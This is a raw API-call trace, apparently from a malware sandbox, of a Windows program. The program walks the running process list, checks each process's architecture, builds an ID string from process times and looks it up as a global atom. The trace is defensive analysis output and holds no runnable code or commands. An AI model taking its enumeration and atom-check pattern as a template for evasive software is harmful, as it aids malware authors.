	[0128.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.718] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.718] CloseHandle (hObject=0x2dc) returned 1
	[0128.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.719] CloseHandle (hObject=0x2dc) returned 1
	[0128.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.719] CloseHandle (hObject=0x2dc) returned 1
	[0128.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.720] CloseHandle (hObject=0x2dc) returned 1
	[0128.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.720] CloseHandle (hObject=0x2dc) returned 1
	[0128.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.721] CloseHandle (hObject=0x2dc) returned 1
	[0128.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.721] CloseHandle (hObject=0x2dc) returned 1
	[0128.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.721] CloseHandle (hObject=0x2dc) returned 1
	[0128.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.722] CloseHandle (hObject=0x2dc) returned 1
	[0128.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.722] CloseHandle (hObject=0x2dc) returned 1
	[0128.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.723] CloseHandle (hObject=0x2dc) returned 1
	[0128.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.723] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetLastError () returned 0x5
	[0128.724] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.725] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.725] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.725] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.726] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetLastError () returned 0x5
	[0128.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.727] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.728] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.728] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.728] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.728] CloseHandle (hObject=0x2dc) returned 1
	[0128.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.728] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.728] CloseHandle (hObject=0x2dc) returned 1
	[0128.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.729] CloseHandle (hObject=0x2dc) returned 1
	[0128.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.729] CloseHandle (hObject=0x2dc) returned 1
	[0128.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.730] CloseHandle (hObject=0x2dc) returned 1
	[0128.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.730] CloseHandle (hObject=0x2dc) returned 1
	[0128.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.766] CloseHandle (hObject=0x2dc) returned 1
	[0128.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.767] CloseHandle (hObject=0x2dc) returned 1
	[0128.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.768] CloseHandle (hObject=0x2dc) returned 1
	[0128.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.768] CloseHandle (hObject=0x2dc) returned 1
	[0128.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.769] CloseHandle (hObject=0x2dc) returned 1
	[0128.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.769] CloseHandle (hObject=0x2dc) returned 1
	[0128.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.769] CloseHandle (hObject=0x2dc) returned 1
	[0128.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.770] CloseHandle (hObject=0x2dc) returned 1
	[0128.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.770] CloseHandle (hObject=0x2dc) returned 1
	[0128.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.771] CloseHandle (hObject=0x2dc) returned 1
	[0128.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.771] CloseHandle (hObject=0x2dc) returned 1
	[0128.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.772] CloseHandle (hObject=0x2dc) returned 1
